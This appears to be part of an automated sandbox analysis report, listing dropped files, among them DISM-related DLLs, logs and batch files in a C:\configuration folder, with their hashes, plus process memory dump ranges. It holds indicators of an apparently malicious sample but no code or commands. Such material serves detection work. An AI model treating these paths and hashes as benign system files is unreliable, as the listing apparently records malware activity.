C:\Users\Admin\AppData\Local\Temp\C3DDCEE5-1943-4C63-85B8-14A4DA41626D\LogProvider.dll

Filesize
77KB

MD5
815a4e7a7342224a239232f2c788d7c0

SHA1
430b7526d864cfbd727b75738197230d148de21a

SHA256
a9c8787c79a952779eca82e7389cf5bbde7556e4491b8bfcfd6617740ac7d8a2

SHA512
0c19d1e388ed0855a660135dec7a5e6b72ecbb7eb67ff94000f2399bd07df431be538055a61cfb2937319a0ce060898bb9b6996765117b5acda8fc0bad47a349

Download Submit
C:\Users\Admin\AppData\Local\Temp\C3DDCEE5-1943-4C63-85B8-14A4DA41626D\OSProvider.dll

Filesize
149KB

MD5
db4c3a07a1d3a45af53a4cf44ed550ad

SHA1
5dea737faadf0422c94f8f50e9588033d53d13b3

SHA256
2165d567aa47264abe2a866bb1bcb01a1455a75a6ea530b1b9a4dda54d08f758

SHA512
5182b80459447f3c1fb63b70ad0370e1da26828a7f73083bec0af875b37888dd12ec5a6d9dc84157fc5b535f473ad7019eb6a53b9a47a2e64e6a8b7fae4cddde

Download Submit
C:\Users\Admin\AppData\Local\Temp\C3DDCEE5-1943-4C63-85B8-14A4DA41626D\OSProvider.dll

Filesize
149KB

MD5
db4c3a07a1d3a45af53a4cf44ed550ad

SHA1
5dea737faadf0422c94f8f50e9588033d53d13b3

SHA256
2165d567aa47264abe2a866bb1bcb01a1455a75a6ea530b1b9a4dda54d08f758

SHA512
5182b80459447f3c1fb63b70ad0370e1da26828a7f73083bec0af875b37888dd12ec5a6d9dc84157fc5b535f473ad7019eb6a53b9a47a2e64e6a8b7fae4cddde

Download Submit
C:\Users\Admin\AppData\Local\Temp\C3DDCEE5-1943-4C63-85B8-14A4DA41626D\dismprov.dll

Filesize
255KB

MD5
490be3119ea17fa29329e77b7e416e80

SHA1
c71191c3415c98b7d9c9bbcf1005ce6a813221da

SHA256
ef1e263e1bcc05d9538cb9469dd7dba5093956aa325479c3d2607168cc1c000a

SHA512
6339b030008b7d009d36abf0f9595da9b793264ebdce156d4a330d095a5d7602ba074075ea05fef3dde474fc1d8e778480429de308c121df0bf3075177f26f13

Download Submit
C:\Users\Admin\AppData\Local\Temp\F8C321F9-C3D2-4F32-9EE5-41DFFA6C67A4\DismCorePS.dll

Filesize
183KB

MD5
a033f16836d6f8acbe3b27b614b51453

SHA1
716297072897aea3ec985640793d2cdcbf996cf9

SHA256
e3b3a4c9c6403cb8b0aa12d34915b67e4eaa5bb911e102cf77033aa315d66a1e

SHA512
ad5b641d93ad35b3c7a3b56cdf576750d1ad4c63e2a16006739888f0702280cad57dd0a6553ef426111c04ceafd6d1e87f6e7486a171fff77f243311aee83871

Download Submit
C:\Users\Admin\AppData\Local\Temp\F8C321F9-C3D2-4F32-9EE5-41DFFA6C67A4\DismCorePS.dll

Filesize
183KB

MD5
a033f16836d6f8acbe3b27b614b51453

SHA1
716297072897aea3ec985640793d2cdcbf996cf9

SHA256
e3b3a4c9c6403cb8b0aa12d34915b67e4eaa5bb911e102cf77033aa315d66a1e

SHA512
ad5b641d93ad35b3c7a3b56cdf576750d1ad4c63e2a16006739888f0702280cad57dd0a6553ef426111c04ceafd6d1e87f6e7486a171fff77f243311aee83871

Download Submit
C:\Users\Admin\AppData\Local\Temp\F8C321F9-C3D2-4F32-9EE5-41DFFA6C67A4\DismHost.exe

Filesize
142KB

MD5
e5d5e9c1f65b8ec7aa5b7f1b1acdd731

SHA1
dbb14dcda6502ab1d23a7c77d405dafbcbeb439e

SHA256
e30508e2088bc16b2a84233ced64995f738deaef2366ac6c86b35c93bbcd9d80

SHA512
7cf80d4a16c5dbbf61fcb22ebe30cf78ca42a030b7d7b4ad017f28fba2c9b111e8cf5b3064621453a44869bbaed124d6fb1e8d2c8fe8202f1e47579d874fa4bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\F8C321F9-C3D2-4F32-9EE5-41DFFA6C67A4\DismProv.dll

Filesize
255KB

MD5
490be3119ea17fa29329e77b7e416e80

SHA1
c71191c3415c98b7d9c9bbcf1005ce6a813221da

SHA256
ef1e263e1bcc05d9538cb9469dd7dba5093956aa325479c3d2607168cc1c000a

SHA512
6339b030008b7d009d36abf0f9595da9b793264ebdce156d4a330d095a5d7602ba074075ea05fef3dde474fc1d8e778480429de308c121df0bf3075177f26f13

Download Submit
C:\Users\Admin\AppData\Local\Temp\F8C321F9-C3D2-4F32-9EE5-41DFFA6C67A4\dismprov.dll

Filesize
255KB

MD5
490be3119ea17fa29329e77b7e416e80

SHA1
c71191c3415c98b7d9c9bbcf1005ce6a813221da

SHA256
ef1e263e1bcc05d9538cb9469dd7dba5093956aa325479c3d2607168cc1c000a

SHA512
6339b030008b7d009d36abf0f9595da9b793264ebdce156d4a330d095a5d7602ba074075ea05fef3dde474fc1d8e778480429de308c121df0bf3075177f26f13

Download Submit
C:\Windows\Logs\DISM\dism.log

Filesize
193KB

MD5
0e686277f200c28018895a1818200027

SHA1
406d9b69d9ad6fa47f7cd277e3fb2d0f4285805d

SHA256
47258225de19282f4e6173b773c985de3b73a94f870bfde00e00d4663ed98f1e

SHA512
7ffb28fba6a83ef002e7b1e52a22d6a811ab9caecf1e268e97ee6e997dbf680303b7f50324dbb9a3369befa5e3a0caa3cad78b4c4ee7c25a96322ff7140fd716

Download Submit
C:\Windows\Logs\DISM\dism.log

Filesize
193KB

MD5
0e686277f200c28018895a1818200027

SHA1
406d9b69d9ad6fa47f7cd277e3fb2d0f4285805d

SHA256
47258225de19282f4e6173b773c985de3b73a94f870bfde00e00d4663ed98f1e

SHA512
7ffb28fba6a83ef002e7b1e52a22d6a811ab9caecf1e268e97ee6e997dbf680303b7f50324dbb9a3369befa5e3a0caa3cad78b4c4ee7c25a96322ff7140fd716

Download Submit
C:\Windows\Logs\DISM\dism.log

Filesize
196KB

MD5
07012ed357696db0346726a4ff73244d

SHA1
4e5c5749351d20f53f6b17c3d160b0de597bc78f

SHA256
f8b98775a6f01740c1394faae3881bd0df6b9e35dea6fe9223a7c52cfbc667cd

SHA512
d58669384346c1ac5492425dc75fd17a60c10f8988469e39e2ed1e12cc230d33cfe0c4ba1158a28f7abe98f6843acace9f529243955d575a13b0491734f7cf78

Download Submit
C:\Windows\Logs\DISM\dism.log

Filesize
199KB

MD5
99d5c01cd15579d67861be583ba63778

SHA1
a51bcfac04515300a1be1cad76d92525681632bf

SHA256
c612dfba34679b4d5e901699ac26e7eccc2335d50f15f46cf48a8838c6a9f20d

SHA512
c6d463ea72c8af880c07931a2e043bb59cefa7b9ef6cdabab1d90a8f8f87448e43428bf64968066b7a6fb3678e311ad146044459766f9d92fc6bf151163bb781

Download Submit
C:\Windows\Logs\DISM\dism.log

Filesize
219KB

MD5
4fbd62bdb84c0efc988b0d240fc277f6

SHA1
f85d6f40e74796d812130074ad65e9650e272cc4

SHA256
e653c59acfa77ed23f91f76edda50d1592e0acd2df51477ba12553b73dbe52c1

SHA512
46952f23735d8b2953b32e9febf065277c3878c0f8a8073d45d1fdac358181893244152fdbb3adb3793b9c223badcd1d6b9ae180be83dbf87a36186655fef231

Download Submit
C:\Windows\Logs\DISM\dism.log

Filesize
219KB

MD5
4fbd62bdb84c0efc988b0d240fc277f6

SHA1
f85d6f40e74796d812130074ad65e9650e272cc4

SHA256
e653c59acfa77ed23f91f76edda50d1592e0acd2df51477ba12553b73dbe52c1

SHA512
46952f23735d8b2953b32e9febf065277c3878c0f8a8073d45d1fdac358181893244152fdbb3adb3793b9c223badcd1d6b9ae180be83dbf87a36186655fef231

Download Submit
C:\Windows\Logs\DISM\dism.log

Filesize
219KB

MD5
4fbd62bdb84c0efc988b0d240fc277f6

SHA1
f85d6f40e74796d812130074ad65e9650e272cc4

SHA256
e653c59acfa77ed23f91f76edda50d1592e0acd2df51477ba12553b73dbe52c1

SHA512
46952f23735d8b2953b32e9febf065277c3878c0f8a8073d45d1fdac358181893244152fdbb3adb3793b9c223badcd1d6b9ae180be83dbf87a36186655fef231

Download Submit
C:\configuration\5201.bat

Filesize
139B

MD5
26d166c26489b85b8d4f8fbedc872640

SHA1
b737203d6707c236aa0d3f3ae30e2d9c9140be2a

SHA256
a492944fe401dfdf3ffbe2b56455f3bc5b43b46ea3e40d93294b14b64d422649

SHA512
e1da34dfbed237e023183489d327a70fae6cb86fafb1674acfa78ac5bee043eb388e209fa94042e6eca03c579024b54917c993a6e62a616b78b8773941d825ce

Download Submit
C:\configuration\and.bat

Filesize
4KB

MD5
06eae53439791f49a13d7653376c4baf

SHA1
fdc9750776c844c6b9db4cb036e8bfd44207b01c

SHA256
97e2bd7eb716a21579d200e487f1dea6ff2fde8cf65e548db537eca0a4f1efec

SHA512
82bc16da8f5edd42aa0eba0ef7747485c2e4b9b1434595f3f7a2c9ae6597a82bbdc3a3ad0b3e03a2d6a3e846227975d7d9b3f7136a749d6d69d3075c7ebb7e8f

Download Submit
C:\configuration\part1.bat

Filesize
847B

MD5
ed3a44915de6013af59284fcb3b73acd

SHA1
4668c34236673d0bb7af47da5789117388107710

SHA256
83fa48a8e5c352b162fb2ae23976341563fc5cff41d9d10208304dc47d0d66cb

SHA512
4fbc5574b5ef04f68f808ae8579221d421b9e0607ee1f16bac7542ab7a49cc5810f0c613c3f6db1d06abc9fc7296cd3b33c8f885e07f559231e1a3950f596a59

Download Submit
memory/752-296-0x0000000000780000-0x00000000007A2000-memory.dmp

Filesize
136KB

Download
memory/752-297-0x0000000005550000-0x0000000005AF4000-memory.dmp

Filesize
5.6MB

Download
memory/1432-292-0x0000000070190000-0x00000000701DC000-memory.dmp

Filesize
304KB

Download
memory/2696-293-0x0000000000E40000-0x000000000100E000-memory.dmp

Filesize
1.8MB

Download
memory/2696-283-0x0000000002FB0000-0x000000000310A000-memory.dmp

Filesize
1.4MB

Download
memory/2696-295-0x000000000B570000-0x000000000B710000-memory.dmp

Filesize
1.6MB

Download
memory/2696-275-0x0000000000E40000-0x000000000100E000-memory.dmp

Filesize
1.8MB

Download
memory/3144-298-0x0000000005700000-0x0000000005792000-memory.dmp

Filesize
584KB

Download
memory/3800-276-0x0000000007120000-0x0000000007152000-memory.dmp

Filesize
200KB

Download
memory/3800-282-0x00000000076D0000-0x0000000007766000-memory.dmp

Filesize
600KB

Download
memory/3800-291-0x00000000077A0000-0x00000000077A8000-memory.dmp

Filesize
32KB

Download
memory/3800-290-0x00000000077C0000-0x00000000077DA000-memory.dmp

Filesize
104KB

Download
memory/3800-289-0x00000000076B0000-0x00000000076BE000-memory.dmp

Filesize
56KB

Download
memory/3800-281-0x00000000074E0000-0x00000000074EA000-memory.dmp

Filesize
40KB

Download
memory/3800-280-0x0000000007470000-0x000000000748A000-memory.dmp

Filesize
104KB

Download
memory/3800-279-0x0000000007AB0000-0x000000000812A000-memory.dmp

Filesize
6.5MB

Download
memory/3800-278-0x0000000006720000-0x000000000673E000-memory.dmp

Filesize
120KB

Download
memory/3800-277-0x0000000070190000-0x00000000701DC000-memory.dmp

Filesize
304KB

Download
memory/3800-273-0x0000000006180000-0x000000000619E000-memory.dmp

Filesize
120KB

Download
memory/3800-272-0x0000000005B20000-0x0000000005B86000-memory.dmp

Filesize
408KB

Download
memory/3800-271-0x0000000005AB0000-0x0000000005B16000-memory.dmp

Filesize
408KB

Download
memory/3800-270-0x00000000059E0000-0x0000000005A02000-memory.dmp

Filesize
136KB

Download
memory/3800-269-0x0000000005380000-0x00000000059A8000-memory.dmp

Filesize
6.2MB

Download
memory/3800-268-0x0000000002830000-0x0000000002866000-memory.dmp

Filesize
216KB

Download
memory/4184-267-0x0000000002AB0000-0x00000000034B0000-memory.dmp

Filesize
10.0MB

Download
memory/4184-260-0x0000000000550000-0x000000000071E000-memory.dmp

Filesize
1.8MB

Download
memory/4184-261-0x00000000034B0000-0x000000000360A000-memory.dmp

Filesize
1.4MB

Download
memory/4184-274-0x0000000000550000-0x000000000071E000-memory.dmp

Filesize
1.8MB

Download
memory/4676-294-0x0000000000760000-0x0000000000761000-memory.dmp

Filesize
4KB

Download
memory/4904-299-0x0000000007030000-0x000000000703A000-memory.dmp

Filesize
40KB

Download